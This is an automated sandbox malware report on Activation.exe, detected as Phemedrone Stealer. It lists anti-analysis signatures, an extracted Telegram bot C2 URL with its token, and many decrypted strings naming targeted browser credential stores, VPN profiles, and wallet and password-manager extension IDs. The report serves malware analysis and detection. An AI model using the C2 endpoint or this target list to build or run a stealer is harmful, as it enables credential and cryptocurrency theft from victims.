Windows Analysis Report
Activation.exe

Overview

General Information

Sample name: Activation.exe
Analysis ID: 1568338
MD5: aa3a94ba72728df41a815b060f5e9c52
SHA1: baec525e25786a3787b90b300a383f814e65377d
SHA256: 573a6686dba8217e51b0c4fd9b041a4bf3ce193d6be69e201a6edcefa3dc42e6
Tags: 45-200-148-86, exe, user-JAMESWT_MHT

Detection

Phemedrone Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Generic Stealer
Yara detected Phemedrone Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Activation.exe (PID: 7588 cmdline: "C:\Users\user\Desktop\Activation.exe" MD5: AA3A94BA72728DF41A815B060F5E9C52)
    • WerFault.exe (PID: 8060 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2432 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendMessage"}
Source | Rule | Description | Author | Strings
00000000.00000002.1654044812.0000000003607000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GenericStealer_9 | Yara detected Generic Stealer | Joe Security |
00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GenericStealer_9 | Yara detected Generic Stealer | Joe Security |
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-04T15:12:01.549797+0100 | 2843856 | 1 | A Network Trojan was detected | 192.168.2.9 | 49746 | 149.154.167.220 | 443 | TCP

            AV Detection

Source: Activation.exe.7588.0.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendMessage"}
Source: Activation.exe ReversingLabs: Detection: 42%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Activation.exe Joe Sandbox ML: detected
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: OpenVPN
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: OpenVPN Connect
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: profiles
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ovpn
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: VPN/OpenVpn/
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ProtonVPN
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ProtonVPN_
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: user.config
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: VPN/ProtonVPN/
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: \
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: SurfShark
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Surfshark
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: *.dat
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: VPN/SurfShark/
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: 7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: -4567089584
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor:
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: tr
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Udofoge
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: .txt
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Pekorojasecopycemonuxazivopenos
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Passwords.txt
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor:
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Messengers/Discord/Tokens.txt
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor:
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Google Accounts/Tokens.txt
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Chromium
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: User Data
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: 1.0.0.0
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Local State
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Network
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Cookies
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: cookies
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Web Data
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: autofill
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Login Data
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: logins
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: token_service
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: credit_cards
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Browser Data/
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: /Cookies[
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ].txt
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor:
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: /AutoFills[
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor:
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Local Storage
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: leveldb
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: CreditCards.txt
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Profile*
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Default
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Authenticator
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: bhghoamapcdpbohphigoooaddinpkbai
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: EOS Authenticator
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: oeljdldpnmdbchonielidgobddffflal
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: BrowserPass
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: naepdomgkenhinolocfifgehidddafch
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: MYKI
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: bmikpgodpkclnkgmnpphehdgcimmided
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Splikity
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: jhfjfclepacoldmjmkmdlmganfaalklb
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: CommonKey
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: chgfefjpcobfbnpmiokfjjaglahmnded
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Zoho Vault
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: igkpcodhieompeloncfnbekccinhapdb
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Norton Password Manager
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: admmjipmmciaobhojoghlmleefbicajg
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Avira Password Manager
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: caljgklbbfbcjjanaijlacgncafpegll
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Trezor Password Manager
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: imloifkgjagghnncjkhggdhalmcnfklk
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: MetaMask
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: nkbihfbeogaeaoehlefnkodbefgpgknn
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: TronLink
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: BinanceChain
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: fhbohimaelbohpjbbldcngcnapndodjp
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Coin98
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: aeachknmefphepccionboohckonoeemg
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: iWallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: kncchdigobghenbbaddojjnnaogfppfj
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Wombat
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: amkmjjmmflddogmhpjloimipbofnfjih
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: NeoLine
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: cphhlgmgameodnhkjdmkpanlelnlohao
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Terra Station
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: aiifbnbfobpmeekipheeijimdpnlpgpp
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Keplr
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: dmkamcknogkgcdfhhbddcghachkejeap
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Sollet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: fhmfendgdocmcbmfikdcogofphimnkno
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ICONex
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: flpiciilemghbmfalicajoolhkkenfel
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: KHC
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: hcflpincpppdclinealmandijcmnkbgn
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: TezBox
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: mnfifefkajgofkcjkemidiaecocnkjeh
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Byone
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: OneKey
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ilbbpajmiplgpehdikmejfemfklpkmke
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Trust Wallets
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: pknlccmneadmjbkollckpblgaaabameg
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: MetaWallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: pfknkoocfefiocadajpngdknmkjgakdg
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Guarda Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: fcglfhcjfpkgdppjbglknafgfffkelnm
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Exodus
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: idkppnahnmmggbmfkjhiakkbkdpnmnon
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: JaxxxLiberty
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: mhonjhhcgphdphdjcdoeodfdliikapmj
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Atomic Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: bhmlbgebokamljgnceonbncdofmmkedg
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Electrum
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: hieplnfojfccegoloniefimmbfjdgcgp
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Mycelium
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: pidhddgciaponoajdngciiemcflpnnbg
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Coinomi
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: blbpgcogcoohhngdjafgpoagcilicpjh
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: GreenAddress
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: gflpckpfdgcagnbdfafmibcmkadnlhpj
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Edge
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: doljkehcfhidippihgakcihcmnknlphh
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: BRD
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: nbokbjkelpmlgflobbohapifnnenbjlh
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Samourai Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: apjdnokplgcjkejimjdfjnhmjlbpgkdi
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Copay
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ieedgmmkpkbiblijbbldefkomatsuahh
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Bread
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: jifanbgejlbcmhbbdbnfbfnlmbomjedj
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: KeepKey
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: dojmlmceifkfgkgeejemfciibjehhdcl
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Trezor
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: jpxupxjxheguvfyhfhahqvxvyqthiryh
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Ledger Live
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: pfkcfdjnlfjcmkjnhcbfhfkkoflnhjln
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Ledger Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: hbpfjlflhnmkddbjdchbbifhllgmmhnm
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Bitbox
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ocmfilhakdbncmojmlbagpkjfbmeinbd
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Digital Bitbox
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: dbhklojmlkgmpihhdooibnmidfpeaing
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: YubiKey
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: mammpjaaoinfelloncbbpomjcihbkmmc
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Google Authenticator
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: khcodhlfkpmhibicdjjblnkgimdepgnd
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Microsoft Authenticator
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: bfbdnbpibgndpjfhonkflpkijfapmomn
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Authy
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: gjffdbjndmcafeoehgdldobgjmlepcal
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Duo Mobile
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: eidlicjlkaiefdbgmdepmmicpbggmhoj
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: OTP Auth
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: bobfejfdlhnabgglompioclndjejolch
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: FreeOTP
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: elokfmmmjbadpgdjmgglocapdckdcpkn
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Aegis Authenticator
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ppdjlkfkedmidmclhakfncpfdmdgmjpm
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: LastPass Authenticator
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: cfoajccjibkjhbdjnpkbananbejpkkjb
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Dashlane
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: flikjlpgnpcjdienoojmgliechmmheek
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Keeper
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: gofhklgdnbnpcdigdgkgfobhhghjmmkj
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: RoboForm
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: hppmchachflomkejbhofobganapojjol
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: KeePass
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: lbfeahdfdkibininjgejjgpdafeopflb
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: KeePassXC
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: kgeohlebpjgcfiidfhhdlnnkhefajmca
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Bitwarden
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: inljaljiffkdgmlndjkdiepghpolcpki
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: NordPass
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: njgnlkhcjgmjfnfahdmfkalpjcneebpl
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: LastPass
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: gabedfkgnbglfbnplfpjddgfnbibkmbb
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Nifty Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: jbdaocneiiinmjbjlgalhcelgbejmnid
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Math Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Coinbase Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: hnfanknocfeofbddgcijnmhnfnkdnaad
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Equal Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: blnieiiffboillknjnepogjhkgnoac
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: EVER Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: cgeeodpfagjceefieflmdfphplkenlfk
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Jaxx Liberty
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ocefimbphcgjaahbclemolcmkeanoagc
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: BitApp Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Mew CX
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: GU Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: nfinomegcaccbhchhgflladpfbajihdf
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Guild Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: nanjmdkhkinifnkgdeggcnhdaammmj
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Saturn Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: nkddgncdjgifcddamgcmfnlhccnimig
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Harmony Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: fnnegphlobjdpkhecapkijjdkgcjhkib
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: TON Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: nphplpgoakhhjchkkhmiggakijnkhfnd
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: OpenMask Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: penjlddjkjgpnkllboccdgccekpkcbin
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: MyTonWallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: fldfpgipfncgndfolcbkdeeknbbbnhcc
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: DeWallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: pnccjgokhbnggghddhahcnaopgeipafg
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: TrustWallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: egjidjbpglichdcondbcbdnbeeppgdph
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: NC Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: imlcamfeniaidioeflifonfjeeppblda
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Moso Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ajkifnllfhikkjbjopkhmjoieikeihjb
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Enkrypt Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: kkpllkodjeloidieedojogacfhpaihoh
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: CirusWeb3 Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: kgdijkcfiglijhaglibaidbipiejjfdp
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Martian and Sui Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: efbglgofoippbgcjepnhiblaibcnclgk
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: SubWallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Pontem Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: phkbamefinggmakgklpkljjmgibohnba
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Talisman Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Kardiachain Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: pdadjkfkgcafgbceimcpbkalnfnepbnk
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Phantom Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: bfnaelmomeimhIpmgjnjophhpkkoljpa
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Oxygen Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: fhilaheimglignddjgofkcbgekhenbh
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: PaliWallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: mgfffbidihjpoaomajlbgchddlicgpn
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: BoltX Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: aodkkagnadcbobfpggnjeongemjbjca
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Liquality Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: kpopkelmapcoipemfendmdghnegimn
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: xDefi Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: hmeobnffcmdkdcmlb1gagmfpfboieaf
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Nami Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Ipfcbjknijpeeillifnkikgncikgfhdo
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: MaiarDeFi Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: dngmlblcodfobpdpecaadgfbeggfjfnm
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: MetaMask Edge Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ejbalbakoplchlghecdalmeeeajnimhm
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Goblin Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: mlbafbjadjidk1bhgopoamemfibcpdfi
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Braavos Smart Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: jnlgamecbpmbajjfhmmmlhejkemejdma
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: UniSat Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: OKX Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: mcohilncbfahbmgdjkbpemcciiolgcge
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Manta Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: enabgbdfcbaehmbigakijjabdpdnimlg
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Suku Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: fopmedgnkfpebgllppeddmmochcookhc
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Suiet Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: khpkpbbcccdmmclmpigdgddabeilkdpd
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Koala Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: lnnnmfcpbkafcpgdilckhmhbkkbpkmid
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ExodusWeb3 Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: aholpfdialjgjfhomihkjbmgjidlcdno
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Aurox Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: kilnpioakcdndlodeeceffgjdpojajlo
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Fewcha Move Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ebfidpplhabeedpnhjnobghokpiioolj
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Carax Demon Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: mdjmfdffdcmnoblignmgpommbefadffd
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Leap Terra Wallet
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: aijcbedoijmgnlmjeegjaglmepbmpkpi
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Local Extension Settings
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Extensions/
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: /
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: [
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ]/
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: PartnerRules
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Last Version
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: .
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Gecko
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Profiles
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: key3.db
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: key4.db
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: cookies.sqlite
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: moz_cookies
